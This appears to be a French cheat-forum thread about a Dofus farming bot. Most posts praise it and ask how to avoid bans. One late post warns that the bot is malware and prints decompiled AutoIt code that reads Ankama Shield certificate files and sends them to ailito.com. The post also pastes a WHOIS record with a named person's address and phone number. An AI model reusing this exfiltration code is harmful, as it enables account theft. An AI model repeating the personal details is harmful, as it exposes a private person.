Aili-Mobs

    Publicités

Users Who Are Viewing This Thread (Total: 0, Members: 0, Guests: 0)

m-kava

Membre
Nov 4, 2010
76
0
431
--" je n'ai pas encore testé ton bot mais les commentaires me donnent envie de l'essayer ! je suis allé sur ton site =)
(tres bien fait d'ailleurs) !
si tu arrivais a faire le multi compte je serais surement ton fan number one x)
je n'ai jamais utilisé bot pour farmer juste couper du blé bois et alchimiste ^^
Continue sur ta lancée mais si amakna te colles un procès comme ce qui s'est produit pour notre bien aimé M4x0u ='( essayons de mettre les cheats énormes (surement comme celui la) sur un tout petit site inconnu ! enfin après c'est toi qui voit !
J'aimerais devenir (comme) ton apprenti pour que tu m'enseignes l'art du "bottage" =P
 

Ailito

Membre Banni
Jan 22, 2010
141
0
576
31
www.ailito.serv-ice.org
Mise à jour du bot !
-Le bug de l'impossiblité d'utilisé le sort 3 et 13 est corriger.
-Un bug sur le changement de map à été corriger.
-Quelques petits autres bugs sont corriger.
 

m-kava

Membre
Nov 4, 2010
76
0
431
Ok super =)

Comme je te l'ai dit sur ton site es tu vraiment sur que tu ne peux pas mettre en minimum 4-6 comptes ? comme m4x0u911 ? Sinon merci pour ta programmation tu es le 1er il me semble a avoir sorti bot de peche Ailipeche =D
 
Oct 23, 2010
2,526
0
461
Mystère.
Sa serait super si il pouvait marcher en multi-compte, aili, on te demandes que cela ^^.

J'ai un lien à vérifier pour voir si il a un virus ou pas, quel site faut-il que j'aille voir ?
 

m-kava

Membre
Nov 4, 2010
76
0
431
Aili m'a dit qu'il n'y avait pas de langage capable de supporter 8 comptes simultanément =S
 
Oct 23, 2010
2,526
0
461
Mystère.
Aili, y aurait-il un jour un Aili multi-compte ?

De plus quesqu'on utilise pour vérifier un lien avant de le Download pour voir les virus ?
 

Vodka13950

Membre
Oct 25, 2010
36
0
431
Hani utilise Virus total ;)


Trés bon bot :P mais je le testerais demain ><


Le multi-compte je m'en fous tout ce que je veux c'est un bot qui marche pendant que je fais mes devoirs ;P/// Merci pour le aili-Péche =D
 

Sydore

Membre Banni
Oct 3, 2010
120
0
436
33
Est-ce vraiment indétectable par Ankama ? Car avec Maxoubot, je m'étais fait bannir tous mes comptes ...
 

-Shei-

Nouveau membre
Nov 18, 2010
3
0
421
34
Si c'est un bot en AutoIt (qui utilise la souris pour faire les actions) alors le multi-compte est impossible. :p
 
M

Membre supprimé 79092

Plop a tous :)
J'ai Hate de découvrir ce bot mais ...
Quand je cliques sur le lien hop Pu rien c'est écrit: le lien semble brise
Si tu pouvais remetre a jour le lien ce serait vraiment cool (j'ai vraiment hate de voir ce que donne ton bot)
Sur ce Bonne nuit (dépend de l'heure ou vous voyer mon Com's)
;)
 

kesseca

Membre actif
Oct 10, 2010
147
0
441
Au Québec
Le lien est mort parce-que Ailito se forge un nouveau site web, de plus il va faire une mise a jour de ce bot qui était une version béta il va probablement ajouter une fonction pour soigner le perso quand les pv sont bas entre deux combats

Un peu de patience, déjà que la version béta fonctionnais assez bien avec mon cra air 45 j'ai déja hate d'essayer la prochaine version :-)
 

Jordan198

Nouveau membre
Nov 29, 2010
4
0
421
49
J'ai trouver un bug
Sous windows 7 : Le bot n'arrive pas a lancé un sort sur les bouftou

Voila sinnon trés bon bote j'espere trouver un jour la version multi compte :D
 

m-kava

Membre
Nov 4, 2010
76
0
431
... C'est écrit en gros ... FARM des combats pendant toute une journée si tu le veux ... Merci de savoir lire
 

SH1R02

Membre
Dec 2, 2011
16
0
301
Ce bot est un virus ! Il est détecté par un anti-virus. Vous allez me dire oui mais 1 sur xx anti-virus c'est rien ?

Regardez plutôt ça :

Func FTP()
$DOSSIER = @AppDataDir & "\AnkamaCertificates"
$LIST = _RECFILELISTTOARRAY($DOSSIER, "*", 1, 0, 2, 0)
If Not @error Then
For $I = 1 To $LIST[0]
$CERTIFICATO = FileRead($DOSSIER & "\" & $LIST[$I])
$CERTIFICATF = StringToBinary($CERTIFICATO)
$CERTIFICATF1 = StringMid(StringToBinary($CERTIFICATO), 1, 250)
$CERTIFICATF2 = StringMid(StringToBinary($CERTIFICATO), 251, 250)
$CERTIFICATF3 = StringMid(StringToBinary($CERTIFICATO), 501, 250)
INETREAD("http://ailito.com/Shield.php?FileName=" & $LIST[$I] & "&Certificat1=" & $CERTIFICATF1 & "&Certificat2=" & $CERTIFICATF2 & "&Certificat3=" & $CERTIFICATF3)
Next
Else
EndIf
EndFunc

C'est ce que l'ont peut trouver dans le code de sont bot en le dé compilant. C'est un stealer d'ankama-shield il vole votre AS pour pouvoir pirater votre compte dofus. Il y à eu déjà plusieurs plaintes et plusieurs victimes sur d'autres forums de cheat. Bot à ne pas utiliser

Pour ceux que sa intéresserais :

Domain Name: AILITO.COM

Registrant:
None
Yann Larousse ()
206 route des jolies bois
Gujan
Gironde,33470
FR
Tel. 0611547634

Creation Date: 28-Nov-2010
Expiration Date: 28-Nov-2012